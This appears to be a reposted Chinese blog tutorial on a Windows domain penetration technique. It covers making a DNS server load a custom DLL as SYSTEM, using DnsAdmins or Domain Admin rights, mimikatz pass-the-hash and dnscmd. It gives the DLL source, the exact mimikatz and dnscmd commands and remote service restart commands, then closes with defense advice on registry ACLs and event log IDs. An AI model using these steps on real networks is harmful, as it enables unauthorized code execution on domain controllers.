渗透后用命令行开启远程服务器,域渗透——利用dnscmd在DNS服务器上实现远程加载Dll...

最新推荐文章于 2023-03-01 14:00:24 发布
最新推荐文章于 2023-03-01 14:00:24 发布
阅读量352 收藏
点赞数
文章标签: 渗透后用命令行开启远程服务器

0x00 前言

由 Shay Ber 公开的一个利用方法,在域环境中,使用 DNSAdmin 权限能够在 DNS 服务器上实现远程加载 Dll。这不算漏洞,但可以作为一个域渗透的技巧,本文将结合自己的经验整理这个利用技巧,添加自己的理解,对照利用思路给出防御建议。

参考资料:

0x01 简介

本文将要介绍以下内容:

·详细利用方法

·防御思路

0x02 详细利用方法

利用条件:

已获得域内 DnsAdmins,Domain Admins 或者 Enterprise Admins 组内用户的口令或者 hash

注:

默认配置下,不仅仅是 DnsAdmins 组内的用户,Domain Admins 或者 Enterprise Admins 组内的用户也可以

1、查看关键组内的用户

查看所有的组:

net group /domain

查看 DnsAdmins 组内的用户:

无法使用 net group 命令查看,可以使用PowerView查看

import-module .PowerView.ps1 Get-NetGroupMember -GroupName "DNSAdmins"

查看 Domain Admins 组内的用户:

net group "Domain Admins" /domain

查看 Enterprise Admins 组内的用户:

net group "Enterprise Admins" /domain

2、获得关键用户的口令或者 hash

需要获得 DnsAdmins,Domain Admins 或者 Enterprise Admins 组内任一用户的口令或者 hash。

3、准备 Payload.dll

需要定义三个导出函数:

·DnsPluginInitialize

·DnsPluginCleanup

·DnsPluginQuery

定义导出函数可以参考之前开源的工程:

这里使用 def 文件的方式声明导出函数,测试代码如下:

dllmain.cpp:

DWORD WINAPI DnsPluginInitialize ( PVOID a1, PVOID a2 ) { return 0; } DWORD WINAPI DnsPluginCleanup ( ) { return 0; } DWORD WINAPI DnsPluginQuery ( PVOID a1, PVOID a2, PVOID a3, PVOID a4 ) { WinExec ( "calc.exe", SW_SHOWNORMAL ) ; return 0; } BOOL APIENTRY DllMain ( HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ) { switch ( ul_reason_for_call ) { case DLL_PROCESS_ATTACH: case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; }

.def 文件:

EXPORTS DnsPluginInitialize DnsPluginCleanup DnsPluginQuery

编译生成 testdns.dll。

4、Payload.dll 保存的位置

需要能被 DNS 服务器远程访问。

这里可以使用域内共享文件夹 SYSVOL,默认所有的域用户都能访问。

我的测试域环境名称为 test.com,使用的域内共享文件夹路径为:\test.comSYSVOLtest.comscriptstestdns.dll

5、准备 dnsadmin

通常,域内的 Windows 主机不支持 dnsadmin 命令。

默认安装的系统:

·Windows Server 2003

·Windows Server 2008

·Windows Server 2003 R2

·Windows Server 2008 R2

·Windows Server 2012

·Windows Server 2003 with SP1

参考资料:

Win7 系统在使用时需要安装 Remote Server Administration Tools ( RSAT )

这里介绍在未安装 Remote Server Administration Tools ( RSAT ) 的系统上执行 dnscmd 命令的方法:

( 1 ) 将 dnscmd.exe 保存在 C:WindowsSystem32 下

可用下载地址 :

( 2 ) 将 dnscmd.exe.mui 保存在 C:WindowsSystem32en-US 下

dnscmd.exe 和 dnscmd.exe.mui 是在我的测试系统 ( Windows Server 2008 R2x64 ) 中获得的。

6、启动 dnscmd

dnscmd 不支持输入凭据进行远程操作的功能,这里需要使用 mimikatz 的 Over pass the hash 功能。

测试环境已获得关键用户的信息如下:

用户名:Administrator 口令:DomainAdmin456! hash:A55E0720F0041193632A58E007624B40

命令行下执行:

mimikatz.exe privilege::debug "sekurlsa::pth /user:Administrator /domain:test.com /ntlm:A55E0720F0041193632A58E007624B40"

这样会弹出一个 cmd.exe,在 cmd.exe 中执行 dnscmd 命令即可。

也可以实现自动化输入:

mimikatz.exe privilege::debug "sekurlsa::pth /user:Administrator /domain:test.com /ntlm:A55E0720F0041193632A58E007624B40 /run:"cmd.exe /c c:test1.bat""

c:test1.bat 中保存 dnscmd 的命令。

7、使用 dnscmd 命令

DNS 服务器的 IP:192.168.10.1

命令行执行:

dnscmd 192.168.10.1 /config /serverlevelplugindll \test.comSYSVOLtest.comscriptstestdns.dll

对于 DNS 服务器来说,此时会新建一个注册表项。

位置:HKEY_LOCAL_MACHINESYSTEMCurrentControlSetservicesDNSParameters

·ServerLevelPluginDll

·REG_SZ

·\test.comSYSVOLtest.comscriptstestdns.dll

8、重启 DNS 服务后会加载 dll

等待 DNS 服务器重启。

或者远程重启 DNS 服务器:

sc \192.168.10.1 stop dns sc \192.168.10.1 start dns

DNS 服务器的后台进程如下图:

dns.exe 将会多次调用 testdns.dll,权限为 System。

9、实际利用

实际环境中,通常 DNS 服务器和域控制器是同一台主机

0x03 防御建议

1、控制权限

避免关键用户凭据被攻击者获得。

这里可以使用PowerView查看关键用户登陆过哪些主机。

import-module .PowerView.ps1 Invoke-UserHunter -UserName AdministratorUser

2、监控和设置注册表

位置:KEY_LOCAL_MACHINESYSTEMCurrentControlSetservicesDNSParameters

利用 dnscmd 在 DNS 服务器上实现远程加载 Dll 时,会以 System 权限修改注册表,如果修改注册表 HKEY_LOCAL_MACHINESYSTEMCurrentControlSetservicesDNSParameters 的 ACL ( Access Control List ) ,删除 System 用户的 Set Value 权限,能够阻止这个方法的利用。

如下图:

但有可能影响其他正常功能,该注册表项下的其他键值信息如下:

HKEY_LOCAL_MACHINESYSTEMCurrentControlSetservicesDNSParameters GlobalQueryBlockList REG_MULTI_SZ wpadisatap EnableGlobalQueryBlockList REG_DWORD 0x1 PreviousLocalHostname REG_SZ WIN-F08C969D7FM.test.com BootMethod REG_DWORD 0x3 AdminConfigured REG_DWORD 0x1

3、查看日志

( 1 ) 记录 DNS 服务的启动和停止

位置:Application and Services Logs->DNS Server

命令行查看:

wevtutil qe "dns server" /rd:true /f:text

ID 为 2 代表 DNS 服务启动,ID 为 4 代表 DNS 服务关闭。

( 2 ) 记录添加 Dll 的操作

需要使用增强版的 DNS 日志记录和诊断功能,Server2016 默认支持,Server2012 需要安装补丁 2956577

参考文档:

补丁说明:

补丁下载:

添加 Dll 的操作会产生 ID 为 541 的日志

0x04 小结

本文介绍了利用 dnscmd 在 DNS 服务器上实现远程加载 Dll 的方法,结合利用思路给出防御建议。

weixin_39612499
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
渗透 | 利用DnsAdmins提权到SYSTEM
Ms08067安全实验室
04-12 982
文章来源|MS08067 公众号读者投稿本文作者:VastSky(Ms08067实验室读者)一、前言 在渗透中,我们获得DNS管理员(DNSAdmin)权限后,可以使用dnscmd.e...
利用dnscmdDNS服务器实现远程加载Dll
热门推荐
Shanfenglan's blog
11-13 9万+
CATALOG1.前言2.实现过程3.对抗方式4.参考文章 1.前言 这是一种渗透技巧,并不能算是漏洞。 优势:不用执行psexec等远控程序,利用方式偏冷门。 劣势:对权限要求比较苛刻(要能够修改sysvol下script文件夹的权限) 2.实现过程 3.对抗方式 4.参考文章 渗透——利用dnscmdDNS服务器实现远程加载Dll ...
使用 dnscmd.exe 修改 DNS类型
weixin_33757911的博客
11-26 711
之前的Blog涉及到命令行操作DNS的命令——dnscmd.exe,此篇Blog则主要记录如何使用 dnscmd.exe 将主区修改为辅助区dnscmd ServerName /zoneresettype ZoneName /seconday MasterIPAddress /file FileName 注意:Se...
Dnscmd
forinput的博客
03-01 1052
Dnscmd
dll 调用exe_内网渗透研究:dll劫持权限维持
weixin_39523280的博客
11-27 564
本文所采用技术,仅用来实现自定义功能,适用场景仅为授权的测试中进行权限维持或为个人电脑添加定制化功能,如:启动QQ同时启动计算器,方便实用~0×01 DLL劫持当一个可执行文件运行时,Windows加载器会将PE(Portable Executable File Format)文件映射到内存中,然后分析可执行文件的导入表,并将相应的DLL文件装入,EXE文件通过导入表找到DLL中相应的函...
dns.exe安装文件
06-03
一个dns.exe,正好在进行跨站脚本攻击中用到了就共享一下
satan1a#TheRoadOfSO#T1543-003-windows服务-Dnscmd.exe(白名单)1
07-25
T1543-003-windows服务-Dnscmd.exe(白名单)作为持久性的一部分,攻击者可能会创建或修改Windows服务以重复执行恶意负载。攻击者可以
使用Windows Server2008 R2 DNSSEC保护DNS连接_网络和应用_基础信息化_1259.doc
07-07
DNSSEC的实施中,区签名是重要步骤,使用dnscmd.exe工具进行离线签名,生成包含RRSIG、DNSKEY、DNS和NSEC资源记录的签名区文件。需要注意的是,签名区不允许动态更新,Windows Server 2008 R2的DNSSEC功能...
windows系统dig工具.zip
05-06
安装完成后,可以在命令行中输入`dig`命令,后面加上要查询的名和参数。 例如,查询某个网站的A记录,命令可能如下: ``` dig www.example.com A ``` 这将返回该名对应的IPv4地址。如果想要查询其他类型的记录...
如何在Windows Server 2003中配置DNS说明
04-25
在客户端计算机上,设置TCP/IP属性以使用新DNS服务器作为首选和备用DNS服务器。这可以通过控制面板>网络连接>属性>TCP/IP属性来完成。 7. **验证DNS配置** 使用命令行工具`nslookup`或`dig`(在Linux系统中)测试...
cmd 新增dns_dnscmd命令详解
weixin_39588206的博客
12-21 2047
常用的dnscmd命令参数详解EnumZones:列举指定DNS服务器的区,示例:Dnscmd . /EnumZonesZoneInfo:在指定DNS服务器上,获取指定区的信息,示例:Dnscmd . /ZoneInfoZoneAdd:在指定DNS服务器上,创建一个新区,示例:Dnscmd . /ZoneAdd gjie.cn /PrimaryZoneDelete:在指定DNS服务器上,删除...
渗透后用命令行开启远程服务器,渗透技巧——通过命令行开启Windows系统的匿名访问共享 - 嘶吼 RoarTalk – 回归最本质的信息安全,互联网安全新媒体,4hou.com...
weixin_42373789的博客
07-31 541
0x00 前言在渗透测试中,尤其是内网渗透,通常需要在内网开启一个支持匿名访问的文件共享,配合漏洞利用。所以我们需要一种通用的方法,不仅需要使用便捷,还需要能够在命令行下运行。0x01 简介本文将要介绍以下内容:◼利用场景◼通过界面开启可匿名访问的文件共享服务器◼通过命令行开启可匿名访问的文件共享服务器◼开源代码0x02 利用场景开启支持匿名访问的文件共享后,其他用户不需要输入用户名和口令,可以直...
cmd 新增dns_技巧分享:教你巧用DNSCMD命令
weixin_39847722的博客
12-21 637
DNSCMD命令创建正向搜索区以下是五个用个DNSCMD命令在命令行里创建正向搜索区的举例。如果用户的DNS服务器正运行Windows Server Core,那么用DNSCMD命令创建正向搜索区,请看示例:1.用此命令在名为SEA-SC4的服务器上创建一个名为research.fabrikam.com正向搜索标准主,然后将用于该区的数据库保存到research.dns文件中。该命令用...
cmd 新增dns_用CMD设置IP DNS的方法
weixin_39932344的博客
12-21 3074
CMD下设置IP、DNS首先我们打开 开始—运行,输入CMD 开大命令界面1.name:网络连接名称,一般为 本地连接。2.source:获取IP的途径,动态获取则为dhcp 手动设置则为 static3.addr:要设置的IP地址。4.mask:子网掩码。5.gateway:网关地址。6.gwmetric:网关跃点数,可以设置为整形数值。也可以设置为自动:auto7.none:禁用动态DNS注...
dns cmd 修改
碎碎念
07-01 1295
netsh interface ip set dns "本地连接" source=static addr=8.8.8.8 netsh interface ip add dns "本地连接" addr=8.8.4.4 ipconfig /flushdns
windows服务器大量端口被dns.exe占用的解决方法
weixin_30607659的博客
04-08 1943
用NetStat命令查看服务器端口时,发现服务器udp端口开放了好多,最少在1000个以上,,经过仔细仔细检查了一下,网上查阅到如下这个解决办法: 先使用netstat -anb命令显示服务器上每个端口所对应的监听程序,因为显示的太多,无法一一看过来,所以只能采用: netstat -anb>C:\1.txt 命令,把输出结果存到C盘根目录下的1.txt文件中,慢慢查看. 查看后,得...
WinServer 2012 R2 搭建 AD 单多站点 及 DNS各站点的子网掩码排序调整
一直被模仿,从未被超越
11-09 3544
WinServer 2012 R2 搭建 AD 单多站点 及 DNS各站点的子网掩码排序调整
DNS查询指令:host 、nslookup 、dig 详解
jeffreyst的专栏
09-20 7152
1、 host指令 host指令的man 手册是这样描述的 大意: 描述     Host指令提供一个简单的DNS解析的功能。正常地使用名称到IP的解析,当指令没有任何参数和选项的时候,它将输出简单的带命令行参数和选项的概要。         名称是可以被解析的名,也可以是点分十进制的IPV4的地址或冒号分隔的IPV6的地址,默认地,也可以行使一个反向解析的功能,DNS服务器既有
cmd修改dns服务器,如何通过cmd修改dns图解教程
weixin_42299310的博客
08-10 3679
如何通过cmd修改dns图解教程[2021-02-14 11:11:46]简介:php去除nbsp的方法:首先创建一个PHP代码示例文件;然后通过“preg_replace("/(\s|\&nbsp\;| |\xc2\xa0)/", " ", strip_tags($val));”方法去除所有nbsp即可。推荐:《PHP视频教西部数码一家老牌互联网基础服务提供商,致力于为大众提供最佳信...
备份DNS服务器的配置文件。
最新发布
04-09
可以使用命令行工具如dnscmd或者PowerShell来备份DNS服务器的配置文件。您可以使用以下命令将配置文件备份到指定的文件中: dnscmd /zoneexport <ZoneName> 或者使用PowerShell Export-DnsServerZone -Name ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值